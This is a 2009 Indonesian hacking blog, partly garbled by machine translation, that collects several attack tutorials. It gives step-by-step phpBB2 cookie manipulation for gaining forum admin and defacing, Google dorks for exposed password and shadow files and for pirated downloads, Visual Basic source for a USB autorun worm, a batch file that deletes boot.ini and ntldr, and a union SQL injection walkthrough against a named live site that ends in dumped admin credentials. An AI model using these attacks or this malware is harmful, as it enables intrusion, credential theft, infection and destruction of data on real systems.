Minggu, 06 September 2009

step by step Deface PHPBB/PHPBB2 Loser_cs_20

Steps PHPBB/PHPBB2 Deface Loser_cs_20
1. Download Mozilla FireFox

2. Download plugin wrote called LiveHTTPHeader
download http://livehttpheaders.mozdev.org/installation.html
most new search

3. then search the target with Uncle Google with the syntax:
phpBB site: [What's up aja]

4. after that go to our download plugin wrote earlier in the Tools -> LiveHTTPHeader

5. Remember, the content must be empty LiveHTTPHeader

6. open the target site, thus LiveHTTPHeader will take all the cookies listed in the target page

7. open successfully after the page marked with a "done" at the bottom of the browser, the next step is to click in the middle LiveHTTPHeader continued clicking Replay option ..

8. after open LiveHTTPReplay clay like the following section on LiveHTTPReplay ...

Cookies: phpbb2mysql_data = a% 3A0% 3A% 7B% 7D; phpbb2mysql_sid = 88da2bbdc1a3a789df094d50d91f7e3b

9. Remove the rear part and after the semi-colon (

Cookies: phpbb2mysql_data = a% 3A0% 3A% 7B% 7D; phpbb2mysql_sid = 88da2bbdc1a3a789df094d50d91f7e3b

\ _______________DELETE ME_________________ /

would be like this:

Cookies: phpbb2mysql_data = a% 3A0% 3A% 7B% 7D

10. then click the replay again, so that the target page will reload all the commands of our cookies washed manipulation

11. further note the following steps:

Cookies: phpbb2mysql_data = a% 3A0% 3A% 7B% 7D
\ ________DELETE this section and replace with:

Cookies: phpbb2mysql_data = a: 2 (s: 11: "autologinid"; s: 32: "602baahpepms74d4cb6f2d012e1e4019"; s: 6: "userid"; s: 1: "2";)

12. then click the replay again, so that the target page will reload all the orders we have cookies manipulation reply earlier.

13. consider again this step:

Cookies: phpbb2mysql_data = a: 2: (s: 11: "autologinid"; s: 32: "602baahpepms74d4cb6f2d012e1e4019"; s: 6: "userid"; s: 1: "2";)
\ ___________________________Change_______________________________ /

be like this:

Cookies: phpbb2mysql_data = a% 3A2% 3A% 7Bs% 3A11% 3A% 22autologinid% 22% 3Bb% 3A1% 3Bs% 3A6% 3A% 22userid% 22% 3Bs% 3A1% 3A% 222% 22% 3B% 7D

14. then click the replay again, so that the target page will reload all the orders we have cookies manipulation reply earlier.

15. finished, please clay target page, you reply you are lucky to get full admin.
Please go to the bottom of the page and see the option "Go To Administration Panel" has emerged




note: surf results in google. hopefully helpful

SQLi for dummies

SQLi for dummies

What is SQLi (SQL Injection / Structured Query Language injection) from the later bored to read the tutorial ... I love better reference links course:) The following links to SQL injection is not my love: P you have to understand what's injection: P it. . tuh .. uh .. uh .. oh .. oh ...:))

just ok dech;)

This discussion of the difficulty of looking dork, hole newbie2 ... SQLi make it now .. easy from there why not we learned in localhost ... but fast loading page ... understand and structure Vuln Table SQL and friends also go ...:)

prepare the equipment:

1. 1 or 2 computers with linux OS or windows OS ... it's up temen2 have what OS at home / office / cafe / have friends who have the same desire to learn things like:) (if you try to use 2 computers networked computer, so this simulation will look more real ... which is 1 server / 1 target and the attacker)
2. XAMPP installer has not had a reply please search sourceforge.net for all OS is there
3. browser (Firefox, Opera, IE, Safari, AOL Browser, Konqueror, or whatever ...)
4. Trainer Module SQLi ... please download here

if ok already prepared all the ingredients ... just ... install XAMPP on your computer ... kalo finished temen2 then run the XAMPP. when you're done extra 'Trainer Module SQLi it (the result of "folder 1" (one) and then put the "folder 1" in the htdocs folder, rather htdocs folder located in the xampp installation folder (ex: XAMPP is installed on C: \ Program Files \ XAMPP ==> so ... is at foder htdocs ... ==> C: \ Program Files \ XAMPP \ htdocs) bener gak yach: -?

next step ... ok xampp configuration dolo:)
CONFIGURATION START ====== ======

try to open your favorite browser ... this was possible we use firefox aja .. fill in the address bar of your browser to "localhost" or "127.0.0.1" (without the quotes) make sure you are in a condition XAMPP Apache and mySQL on it. (see Figure 1)

Code: Select all
http://www.redgeographics.com/img/xampp_control_panel.png
Figure 1 (picture not mine: P)



when it ... the browser will find that this tamppilan (picture 2)

Code: Select all
http://www.javipas.com/wp-content/xampp.jpg
Figure 2 (not mine, too: p)



nah kalo was kebuka into phpMyAdmin (see ditampilan xampp in your browser!). then xampp page will redirect to the phpMyAdmin page (figure 3)

Code: Select all
http://img221.imageshack.us/img221/1015/screenshot15.png
image 3 (the original image I :));)



The next step tetep note image number 3 ....

* In point 1 (Create Database) create a database with the name "Xcode" without the quotes,
* Then press the create (point 2)

after that ... the left side dikolom will appear "database name" that you created ... and the browser screen will change like this (picture 4)

Code: Select all
http://img155.imageshack.us/img155/4821/screenshot16.png
Figure 4 (cave drawings also nech:))



fixed note ... after the 4th picture appears on the display .. then look there a database that you created (point 1) .. nah from there ... press the import button (point 2) then the browser will display the following changes as well: P (figure 5)

Code: Select all
http://img145.imageshack.us/img145/7172/screenshot17z.png
Figure 5 (lagi2 not steal images on google: P)



in the figure 5 there is a media uploader ... but not upload php isa seems:)) love ... gak isa shell upload them through the media =)) well on the ... 1 point upload the SQL file (file name: xcode.sql.zip) that there the package Module Trainer SQLi (I have prepared well ... not so good what I was exactly in the folder =));) the temen 1 put in XAMPP htdocs folder:)

when ready to upload, then press GO (point 2) and ... the display changes again =)) (picture 6)

Code: Select all
http://img150.imageshack.us/img150/6618/screenshot18p.png
Figure 6


nah of this image can be seen that has managed to upload / import the sql file (point 1). and the results can be seen a few tables are formed from the file and columns in the tablenya: d (point 2)

nah that was his configuration settings: P

now living learning: D
======= ======= END OF CONFIGURATION

nah way expiry date ...

input into the address bar is the address "localhost / 1" or "127.0.0.1 / 1"

while it was ok ... will be connected to the discussion of reply or comment:)

video configurasinya following way:)

if the tutorial many scattered dah ...
I aim for nech ... biar temen know how to correct PHP coding ...
know the MySQL database structure (temen2 indirectly to see more of what it is apache)

Google Hacking+Mencari sistem/server yg memiliki kelemahan

Google Hacking + Finding system / server propertied weaknesses


Looking for a system or server that has a weakness with the syntax "intitle:" or "allintitle:"

1. Using allintitle: "index of / root" (without quotes) will display the list of links on the Web server that provides access to a restricted directory as root directory.

2. Using allintitle: "index of / admin" (without the quotes) will
display links on the site that has an index that can be accessed browsing to the directory as a directory restricted "admin".

Other uses of syntax "intitle:" or "allintitle:" combined with other syntax, among others:

Code: Select all
intitle: "Index of". sh_history
intitle: "Index of". bash_history
intitle: "index of" passwd
intitle: "index of" people.lst
intitle: "index of" pwd.db
intitle: "index of" etc / shadow
intitle: "index of" spwd
intitle: "index of" master.passwd
intitle: "index of" htpasswd
intitle: "index of" members OR accounts
intitle: "index of" user_carts OR user_cart
allintitle: sensitive filetype: doc
allintitle: restricted filetype: mail
allintitle: restricted filetype: doc site: gov
allintitle: *. php? filename =*
allintitle: *. php? page =*
allintitle: *. php? logon =*



The use and combination of the syntax is not only limited to the example above exposure. There are many more combinations of syntax syntax with keywords that can be used. It depends on the creativity and willingness to try. There is good use of discourse that have been outlined was used for purposes that do not cause loss or damage.
Weakness in a system or server that is well known to be sharing with the relevant system administrators that can benefit all parties. Due to the likely outcome of the search information may provide sensitive information, which is often related to the security aspects of a system or server.
Discourse about the syntax that is very helpful in the search for such information ultimately depends on the intention and purpose in the search data. Is it really done for the needs of collecting data, gathering information from a penetration of the target machine. The ultimate goal depends on the individual intentions that the author is not responsible for the misuse of the information that has been presented. As the proverb says new taxes borne winner.

... Om Google ... this collection of tips that I got from various sources of reliable and guaranteed to make percarian in google search engine ..
1. Googling E-Book.

Code: Select all
+ ( "Index of") + ( "/ ebooks" | "/ book") + (chm | pdf | zip | rar) + apache


Is a query that produces Index ebook on Apache based servers
Book Title. [/ B]

Code: Select all
allinurl: + (rar | chm | zip | pdf | tgz | lit)

.
Change the "title of the book" with a book that wants to dicari.sbgai example: If you want to search for "Harry Potter", substitute "the title of the book" with Harry is used if Potter.Cara really know the title of the book you are looking for.

2. Warez Googling.

Code: Select all
"Parent directory" Xvid-xxx-html-htm-php-shtml-opendivx-md5-md5sums
"Parent directory" MP3-xxx-html-htm-php-shtml-opendivx-md5-md5sums
"Parent directory" applications-xxx-html-htm-php-shtml-opendivx-md5-md5sums
"Parent directory" Gamez-xxx-html-htm-php-shtml-opendivx-md5-md5sums
"Parent directory" DVDRip-xxx-html-htm-php-shtml-opendivx-md5-md5sums



Replace the bold words with the query.
For example, if you want to search for LimeWire so instead of "applications" by LimeWire.
if you want to search for songs from Deep Purple Child In Time, entitled, replace "MP3? with Child in Time, or if you want to search for songs Deep Purple live instead of "MP3? with Deep Purple.

3. Googling MP3

Code: Select all
? intitle: index.of? mp3


Another way to search for MP3 in google is to use this query. After MP3 pengen love what sought.
Example, If you want to search for Led Zeppelin then it will query like this:

Code: Select all
? intitle: index.of? mp3 led zeppelin



4. Googling the file on Megaupload
To search for Video file type:

Code: Select all
avi | mpg | mpeg | wmv | rmvb site: megaupload.com


To find music files type:

Code: Select all
mp3 | ogg | wma site: megaupload.com


To search the archive and the program type:

Code: Select all
zip | rar | exe site: megaupload.com


To search for ebooks type:

Code: Select all
pdf | rar | zip | doc | lit site: megaupload.com



5. Googling the file in rapidshare.de
To search for Video file type:

Code: Select all
avi | mpg | mpeg | wmv | rmvb site: rapidshare.de


To find music files type:

Code: Select all
mp3 | ogg | wma site: rapidshare.de


To search the archive and the program type:

Code: Select all
zip | rar | exe site: rapidshare.de


To search for ebooks type:

Code: Select all
pdf | doc | lit | rar | zip site: rapidshare.de



To Googling on Megaupload and rapidshare can just put what you want in the first part.
Example: If you want to search for DA VINCI CODE ebook use this query:

Code: Select all
da vinci code pdf | doc | lit | rar | zip site: rapidshare.de


(this if we really know the title of his book.)

Code Infeksi USB Visual Basic

dir\system32

Code: Select all
Public Function InfeksiUSB(DigitalCat As String, AD As String)
Dim FSO, USBCatLER, USBCat

Set FSO = CreateObject("SCRIPTING.FILESYSTEMOBJECT")
Set USBCatLER = FSO.DRIVES
For Each USBCat In USBCatLER
If USBCat.DRIVETYPE = 1 Then 'EGER SILINEBILIR ISE

If Right(YOL, 1) <> "\" Then DigitalCat= DigitalCat& "\"

If DigitalUSB(USBCat & "\autorun.inf") Then
SetAttr USBCat & "\autorun.inf", 0
Kill USBCat & "\autorun.inf"
End If

Open USBCat & "\autorun.inf" For Append As #1
Print #1, "[autorun]" & vbCrLf & _
"open=" & USBCat & "\" & AD
Close #1

If Not DigitalUSB(USBCat & "\" & AD) Then
FileCopy DigitalCat& AD, USBCat & "\" & AD
End If

SetAttr USBCat & "\" & AD, 4
SetAttr USBCat & "\autorun.inf", 4
SetAttr USBCat & "\" & AD, 2
SetAttr USBCat & "\autorun.inf", 2
End If
Next

End Function

Public Function DigitalUSB(DosyaAdi As String) As Boolean
On Error GoTo CekUSB
Call FileLen(DosyaAdi)
DigitalUSB = True
Exit Function
CekUSB:
End Function

Sub Main()
InfeksiUSB App.Path, App.EXEName & ".exe"
End Sub

Sabtu, 05 September 2009

shut down komputer untuk selamanya

Code: Select all
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini



save dengan ekstensi .bat

nb:trick lama.tapi kadang2 ga berkerja klo cmd-nya di disable sama admin pc tsb

SQL Injection Pada PHP

dir\system32

Untuk pertama kalinya gw mau memberanikan diri untuk posting tentang SQL Injection, soal nya gw juga masih belajar dalam hal ini :lol: kalo kiranya gw salah tolong di koreksi dan yang udah master jangan baca postingan ini ini cuma buat newbie kaya gw
DORK

Code: Select all
inurl:news_detail.php?id=



Contoh target

Code: Select all
http://www.lbpl.in/news_detail.php?id=14


masukian tanda petik (')
kurang lebih seperti di bawah ini

Code: Select all
http://www.lbpl.in/news_detail.php?id=14'


lalu muncul error seperti

Code: Select all
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1


berarti site ini Vuln, setelah terdapat error seperti di atas gunakan perintah ORDER BY untuk mencari panjang column, dan jangan lupa gunakan -- di belakang angka yang di masukan :lol:
contoh nya seperti di bawah ini
http://www.lbpl.in/news_detail.php?id=1 ... 20by%201--
tidak menampilkan eror coba gunakan order by 10 atau 100
kurang lebih nya seperti contoh

Code: Select all
http://www.lbpl.in/news_detail.php?id=14%20order%20by%2010--


order by 10 site mengeluarkan error seperti Unknown column '10' in 'order clause' berarti panjang column tidak sampai 10 :lol: coba gunakan order by 5 untuk mengecek nya.. ternyata site masih mengeluarkan error seperti di atas gunakan lagi order by 4 untuk mengecek yang ke 3 kali nya.......... sssttttt site tidak menampilkan error setelah itu gunakan perintah UNION+ALL+SELECT+1,2,3,4-- loh kok cuma sampai 4 karena batas eror nya ada di column 4, jangan lupa gunakan gunakan (-) kurang lebih contoh nya seperti di bawah

Code: Select all
http://www.lbpl.in/news_detail.php?id=-14 union all select 1,2,3,4--


setelah menggunakan perintah UNION+ALL+SELECT+1,2,3,4-- site tidak mengeluarkan error melainkan mengeluarkan angka angka ajaib kenapa di sebut ajaib karena dengan angka itu kita bisa melanjutkan SQLInjection he2
setelah angka muncul gunakan perintah VERSION() column angka, contoh nya di bawah ini

Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,version(),3,4--


setelah menggunakan perintah VERSION() muncul seperti 5.0.77MM0.1-LOG
ternyata versi 5 beruntung lah gw malam ini ck ck soal nya kalo Versi 4 musti tebak tebak table nya ok masalah versi 4 ntr nyusul lagi :P
setelah mengetahui versinya ganti perintah VERSION() dengan GROUP_CONCAT(TABLE_NAME) serta berikan perintah FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()-- di belakang column, perintah tersebut untuk mengetahi nama nama table pada database;) kurang lebih contohnya di bawah ini

Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(TABLE_NAME),3,4%20FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--


Setelah menggunakan perintah di atas muncul ADMIN,BANNER,CATALOGUE,NEWS,USERS,VIDEO Gunakan table admin, sebelum nya kita meng-konversi dolo table admin menjadi bentuk hexadecimal_sql seperti 0x41444d494e kurang lebih contoh nya seperti

Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(column_NAME),3,4%20FROM+INFORMATION_SCHEMA.columnS+WHERE+TABLE_name=0x41444d494e--


setelah itu muncul ID,USERNAME,PASS inilah detik detik menuju ahir :D ganti Column_name dengan 0x2b,USERNAME,PASS kurang lebih nya lihat contoh yang terahir kali nya.... :lol: :lol: :lol: :lol: :lol:

Code: Select all
http://www.lbpl.in/news_detail.php?id=-14%20union%20all%20select%201,GROUP_CONCAT(0x2b,USERNAME,PASS),3,4%20FROM+admin--


nah ahir dari perjalanan ini adalah ADMINADMIN Username = admin Pass = admin

Cukup sampai di sini Tutorial CUPU dari gw kalo ada salah kata atau penempatan tulisan tolong di koreksi, sekian dan Terima kasih.....